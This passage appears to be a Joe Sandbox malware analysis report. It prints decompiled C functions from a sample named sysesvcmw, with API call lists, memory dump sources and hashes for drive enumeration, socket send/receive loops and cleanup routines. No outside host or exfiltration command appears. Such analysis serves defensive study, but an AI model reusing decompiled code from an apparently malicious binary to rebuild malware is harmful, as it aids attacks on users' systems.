                                                                                                                                                                                                                                                                                    						if(QueryDosDeviceW(_a4,  &_v1052, 0x208) != 0 && StrCmpNW( &_v1052, L"\\??\\", 4) == 0) {
                                                                                                                                                                                                                                                                                    							_v8 = 1;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                                                    0x00404be3
                                                                                                                                                                                                                                                                                    0x00404be9
                                                                                                                                                                                                                                                                                    0x00404bf6
                                                                                                                                                                                                                                                                                    0x00404bff
                                                                                                                                                                                                                                                                                    0x00404c24
                                                                                                                                                                                                                                                                                    0x00404c3e
                                                                                                                                                                                                                                                                                    0x00404c3e
                                                                                                                                                                                                                                                                                    0x00404c24
                                                                                                                                                                                                                                                                                    0x00404bff
                                                                                                                                                                                                                                                                                    0x00404c4b

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(00404C8F), ref: 00404BDD
                                                                                                                                                                                                                                                                                    • QueryDosDeviceW.KERNEL32(00404C8F,?,00000208), ref: 00404C1C
                                                                                                                                                                                                                                                                                    • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00404C34
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DeviceDriveQueryType
                                                                                                                                                                                                                                                                                    • String ID: \??\
                                                                                                                                                                                                                                                                                    • API String ID: 1681518211-3047946824
                                                                                                                                                                                                                                                                                    • Opcode ID: 84def6f5971ed18c5027915d3437ea3a00eaa7db189a83ce85c670b15ed75c6e
                                                                                                                                                                                                                                                                                    • Instruction ID: 6661d798698d2c2b86e5031d8900814977fd28410c715a717113d467a9626b5b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84def6f5971ed18c5027915d3437ea3a00eaa7db189a83ce85c670b15ed75c6e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26014FB494520CEBDF64CF95CE48AD977B4AB84701F0081BAAB05A7280D6789EC5CF9C
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 29%
                                                                                                                                                                                                                                                                                    			E0040EA30(char _a4) {
                                                                                                                                                                                                                                                                                    				long _v4;
                                                                                                                                                                                                                                                                                    				struct _OVERLAPPED* _v8;
                                                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                                                                    				signed int _t31;
                                                                                                                                                                                                                                                                                    				signed int _t32;
                                                                                                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                                                                                                    				struct _OVERLAPPED* _t38;
                                                                                                                                                                                                                                                                                    				long _t43;
                                                                                                                                                                                                                                                                                    				char _t51;
                                                                                                                                                                                                                                                                                    				struct _OVERLAPPED* _t52;
                                                                                                                                                                                                                                                                                    				long* _t54;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t54 =  &_v12;
                                                                                                                                                                                                                                                                                    				_t51 = _a4;
                                                                                                                                                                                                                                                                                    				_t52 = 0;
                                                                                                                                                                                                                                                                                    				_v4 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_t31 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                                                                                                                                                                                                                    				_t43 = _v12;
                                                                                                                                                                                                                                                                                    				_t32 = _t31 & 0xffffff00 | _t31 != 0x00000000;
                                                                                                                                                                                                                                                                                    				if(_t43 == 0) {
                                                                                                                                                                                                                                                                                    					return _t32;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					if(_t32 == 0) {
                                                                                                                                                                                                                                                                                    						_t38 =  *((intOrPtr*)(_t43 + 0x260));
                                                                                                                                                                                                                                                                                    						__imp__WSAGetOverlappedResult(_t38, _v8,  &_v4, 0,  &_a4);
                                                                                                                                                                                                                                                                                    						if(_t38 == 0) {
                                                                                                                                                                                                                                                                                    							__imp__#111();
                                                                                                                                                                                                                                                                                    							_t52 = _t38;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_push(_t52);
                                                                                                                                                                                                                                                                                    					E0040E840(_v8, _v4, _v12);
                                                                                                                                                                                                                                                                                    					_t54 =  &(_t54[1]);
                                                                                                                                                                                                                                                                                    					_t52 = 0;
                                                                                                                                                                                                                                                                                    					_v4 = 0;
                                                                                                                                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                                                                    					_t36 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                                                                                                                                                                                                                    					_t43 = _v12;
                                                                                                                                                                                                                                                                                    					_t32 = _t36 & 0xffffff00 | _t36 != 0x00000000;
                                                                                                                                                                                                                                                                                    				} while (_t43 != 0);
                                                                                                                                                                                                                                                                                    				return _t32;
                                                                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                                                                    0x0040ea30
                                                                                                                                                                                                                                                                                    0x0040ea3c
                                                                                                                                                                                                                                                                                    0x0040ea53
                                                                                                                                                                                                                                                                                    0x0040ea57
                                                                                                                                                                                                                                                                                    0x0040ea5b
                                                                                                                                                                                                                                                                                    0x0040ea5f
                                                                                                                                                                                                                                                                                    0x0040ea63
                                                                                                                                                                                                                                                                                    0x0040ea65
                                                                                                                                                                                                                                                                                    0x0040ea6b
                                                                                                                                                                                                                                                                                    0x0040ea70
                                                                                                                                                                                                                                                                                    0x0040eaef
                                                                                                                                                                                                                                                                                    0x0040eaef
                                                                                                                                                                                                                                                                                    0x0040ea73
                                                                                                                                                                                                                                                                                    0x0040ea75
                                                                                                                                                                                                                                                                                    0x0040ea87
                                                                                                                                                                                                                                                                                    0x0040ea8f
                                                                                                                                                                                                                                                                                    0x0040ea97
                                                                                                                                                                                                                                                                                    0x0040ea99
                                                                                                                                                                                                                                                                                    0x0040ea9f
                                                                                                                                                                                                                                                                                    0x0040ea9f
                                                                                                                                                                                                                                                                                    0x0040ea97
                                                                                                                                                                                                                                                                                    0x0040eaad
                                                                                                                                                                                                                                                                                    0x0040eaae
                                                                                                                                                                                                                                                                                    0x0040eab3
                                                                                                                                                                                                                                                                                    0x0040eac9
                                                                                                                                                                                                                                                                                    0x0040eacd
                                                                                                                                                                                                                                                                                    0x0040ead1
                                                                                                                                                                                                                                                                                    0x0040ead5
                                                                                                                                                                                                                                                                                    0x0040ead9
                                                                                                                                                                                                                                                                                    0x0040eadb
                                                                                                                                                                                                                                                                                    0x0040eae1
                                                                                                                                                                                                                                                                                    0x0040eae4
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040EA63
                                                                                                                                                                                                                                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 0040EA8F
                                                                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 0040EA99
                                                                                                                                                                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040EAD9
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2074799992-0
                                                                                                                                                                                                                                                                                    • Opcode ID: da4c304c9c1be7b6ec673d01c7b8ed459bae1c4d061c2b26b3558c89e2bae2e2
                                                                                                                                                                                                                                                                                    • Instruction ID: 57984d4194687ad85c3307d42481ebd1fe789462df0af38e0fad0134068e6b44
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da4c304c9c1be7b6ec673d01c7b8ed459bae1c4d061c2b26b3558c89e2bae2e2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C213EB15083119BC600DF55D880D6BB7E8BFDCB64F044A2EF598A3250D734EA49CBAA
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • WSARecv.WS2_32(?,00000224,00000001,?,00000208,00000208,00000000), ref: 0040E768
                                                                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32(?,00000000), ref: 0040E770
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001,?,00000000), ref: 0040E786
                                                                                                                                                                                                                                                                                    • WSARecv.WS2_32(?,00000224,00000001,?,?,00000208,00000000), ref: 0040E7AC
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Recv$ErrorLastSleep
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3668019968-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c27d7355d997e997ad15a14d69b16d301b2f1f4b418a8c27a866cefb6ec18630
                                                                                                                                                                                                                                                                                    • Instruction ID: ce078963949e4c85844abf3da7583f675a37e97f6c8ed4734d1f7ba0ccbfa151
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c27d7355d997e997ad15a14d69b16d301b2f1f4b418a8c27a866cefb6ec18630
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C211AD76104305AFD310CF65EC84EEBB7ECEB88700F40492AF945D3280E679E94997B2
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E5EC
                                                                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 0040E5F2
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040E608
                                                                                                                                                                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E62A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Send$ErrorLastSleep
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2121970615-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 92b9ff23b28bc40c6e9e710034151e6c318f4b9486cff39ba22ee0894646fa3f
                                                                                                                                                                                                                                                                                    • Instruction ID: 3e3dd8552cbe75fe5ae1c554dac2643b1da2c24a2dcdc53f0862cdb527b38f0e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92b9ff23b28bc40c6e9e710034151e6c318f4b9486cff39ba22ee0894646fa3f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B40162712443056FE730CE96DC88F9B77ACEBC8711F40882AF608D61C0C7B5A9469B79
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E0040E280(void* __esi) {
                                                                                                                                                                                                                                                                                    				intOrPtr _t13;
                                                                                                                                                                                                                                                                                    				intOrPtr _t19;
                                                                                                                                                                                                                                                                                    				struct _CRITICAL_SECTION* _t21;
                                                                                                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t22 = __esi;
                                                                                                                                                                                                                                                                                    				_t23 =  *((intOrPtr*)(_t24 + 0xc));
                                                                                                                                                                                                                                                                                    				_t21 = _t23 + 0x244;
                                                                                                                                                                                                                                                                                    				EnterCriticalSection(_t21);
                                                                                                                                                                                                                                                                                    				if(__esi == 0) {
                                                                                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                                                                                    					LeaveCriticalSection(_t21);
                                                                                                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					if(InterlockedExchangeAdd(__esi + 0x14, 0) == 0) {
                                                                                                                                                                                                                                                                                    						_t13 =  *((intOrPtr*)(__esi + 0x38));
                                                                                                                                                                                                                                                                                    						_t19 =  *((intOrPtr*)(__esi + 0x34));
                                                                                                                                                                                                                                                                                    						if(_t13 != 0) {
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t13 + 0x34)) = _t19;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(_t19 == 0) {
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t23 + 0x25c)) = _t13;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t19 + 0x38)) = _t13;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						E00408C70( *((intOrPtr*)(_t22 + 0x2c)));
                                                                                                                                                                                                                                                                                    						E00408C70(_t22);
                                                                                                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						LeaveCriticalSection(_t21);
                                                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    0x0040e280
                                                                                                                                                                                                                                                                                    0x0040e282
                                                                                                                                                                                                                                                                                    0x0040e287
                                                                                                                                                                                                                                                                                    0x0040e290
                                                                                                                                                                                                                                                                                    0x0040e298
                                                                                                                                                                                                                                                                                    0x0040e2e7
                                                                                                                                                                                                                                                                                    0x0040e2e8
                                                                                                                                                                                                                                                                                    0x0040e2f3
                                                                                                                                                                                                                                                                                    0x0040e29a
                                                                                                                                                                                                                                                                                    0x0040e2a8
                                                                                                                                                                                                                                                                                    0x0040e2b9
                                                                                                                                                                                                                                                                                    0x0040e2bc
                                                                                                                                                                                                                                                                                    0x0040e2c1
                                                                                                                                                                                                                                                                                    0x0040e2c3
                                                                                                                                                                                                                                                                                    0x0040e2c3
                                                                                                                                                                                                                                                                                    0x0040e2c8
                                                                                                                                                                                                                                                                                    0x0040e2cf
                                                                                                                                                                                                                                                                                    0x0040e2ca
                                                                                                                                                                                                                                                                                    0x0040e2ca
                                                                                                                                                                                                                                                                                    0x0040e2ca
                                                                                                                                                                                                                                                                                    0x0040e2d9
                                                                                                                                                                                                                                                                                    0x0040e2df
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e2aa
                                                                                                                                                                                                                                                                                    0x0040e2ad
                                                                                                                                                                                                                                                                                    0x0040e2b8
                                                                                                                                                                                                                                                                                    0x0040e2b8
                                                                                                                                                                                                                                                                                    0x0040e2a8

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,0040E34C,?,?), ref: 0040E290
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E2A0
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040E34C,?,?), ref: 0040E2AD
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040E34C,?,?), ref: 0040E2E8
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2223660684-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e7775c6e724d18b6b16e4560ed2e445d19ec959f5a48ac8fdc33ada78c93d50a
                                                                                                                                                                                                                                                                                    • Instruction ID: e6ac6c1a31680b607f42abd4f6290106e839e9b4de79647b68f4cbd1092355c7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7775c6e724d18b6b16e4560ed2e445d19ec959f5a48ac8fdc33ada78c93d50a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4001DF35242204AFC3209F63ED44ADB73ACAB85B21B00483EE946A3681CB39E441CB38
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E0040BDD0(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                    				intOrPtr* _v8;
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                    					_v8 = _a4;
                                                                                                                                                                                                                                                                                    					EnterCriticalSection(_v8 + 4);
                                                                                                                                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                                                                                                                                    					while(_v12 <  *_v8) {
                                                                                                                                                                                                                                                                                    						_t11 = _v8 + 0x1c; // 0xfe5ae850
                                                                                                                                                                                                                                                                                    						CloseHandle( *( *_t11 + _v12 * 4));
                                                                                                                                                                                                                                                                                    						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					LeaveCriticalSection(_v8 + 4);
                                                                                                                                                                                                                                                                                    					DeleteCriticalSection(_v8 + 4);
                                                                                                                                                                                                                                                                                    					_t18 = _v8 + 0x1c; // 0xfe5ae850
                                                                                                                                                                                                                                                                                    					E00408C70( *_t18);
                                                                                                                                                                                                                                                                                    					return E00408C70(_a4);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t20;
                                                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                                                    0x0040bdda
                                                                                                                                                                                                                                                                                    0x0040bddf
                                                                                                                                                                                                                                                                                    0x0040bde9
                                                                                                                                                                                                                                                                                    0x0040bdef
                                                                                                                                                                                                                                                                                    0x0040be01
                                                                                                                                                                                                                                                                                    0x0040be0e
                                                                                                                                                                                                                                                                                    0x0040be18
                                                                                                                                                                                                                                                                                    0x0040bdfe
                                                                                                                                                                                                                                                                                    0x0040bdfe
                                                                                                                                                                                                                                                                                    0x0040be27
                                                                                                                                                                                                                                                                                    0x0040be34
                                                                                                                                                                                                                                                                                    0x0040be3d
                                                                                                                                                                                                                                                                                    0x0040be41
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040be52
                                                                                                                                                                                                                                                                                    0x0040be58

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0040EC80), ref: 0040BDE9
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(0040EC84), ref: 0040BE18
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0040EC80), ref: 0040BE27
                                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(0040EC80), ref: 0040BE34
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3102160386-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d585c410c8feea3006216bdaf8938572b99092e330cb370cdf972aaff2801c2a
                                                                                                                                                                                                                                                                                    • Instruction ID: b4a8df68a5ba6ddb4f07b24493b5635e0034f74153efd53aa39cf24915a517ea
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d585c410c8feea3006216bdaf8938572b99092e330cb370cdf972aaff2801c2a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF111E74900208EBDB04DF94D984A9DB7B5FF45309F2081A9E90667341DB35EE90DB99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 66%
                                                                                                                                                                                                                                                                                    			E0040CC30(char* _a4) {
                                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t46;
                                                                                                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                                                                                                    				intOrPtr _t62;
                                                                                                                                                                                                                                                                                    				void* _t88;
                                                                                                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                                                                                                    				void* _t90;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				_t44 = E0040C260(_a4,  &_v8);
                                                                                                                                                                                                                                                                                    				_t89 = _t88 + 8;
                                                                                                                                                                                                                                                                                    				_v12 = _t44;
                                                                                                                                                                                                                                                                                    				if(_v12 != 0) {
                                                                                                                                                                                                                                                                                    					_t46 = E0040C000(_v12);
                                                                                                                                                                                                                                                                                    					_t90 = _t89 + 4;
                                                                                                                                                                                                                                                                                    					_v20 = _t46;
                                                                                                                                                                                                                                                                                    					if(_v20 != 0) {
                                                                                                                                                                                                                                                                                    						_v24 = 0;
                                                                                                                                                                                                                                                                                    						_push( &_v24);
                                                                                                                                                                                                                                                                                    						_push(_v20);
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xb4))))() == 0 && _v24 != 0) {
                                                                                                                                                                                                                                                                                    							_v28 = 0;
                                                                                                                                                                                                                                                                                    							_push( &_v28);
                                                                                                                                                                                                                                                                                    							_push(_v24);
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x30))))() == 0 && _v28 != 0) {
                                                                                                                                                                                                                                                                                    								_t59 = E0040CBE0(_v28);
                                                                                                                                                                                                                                                                                    								_t90 = _t90 + 4;
                                                                                                                                                                                                                                                                                    								_v32 = _t59;
                                                                                                                                                                                                                                                                                    								if(_v32 != 0) {
                                                                                                                                                                                                                                                                                    									_t62 = E0040CAC0(_v28);
                                                                                                                                                                                                                                                                                    									_t90 = _t90 + 4;
                                                                                                                                                                                                                                                                                    									_v36 = _t62;
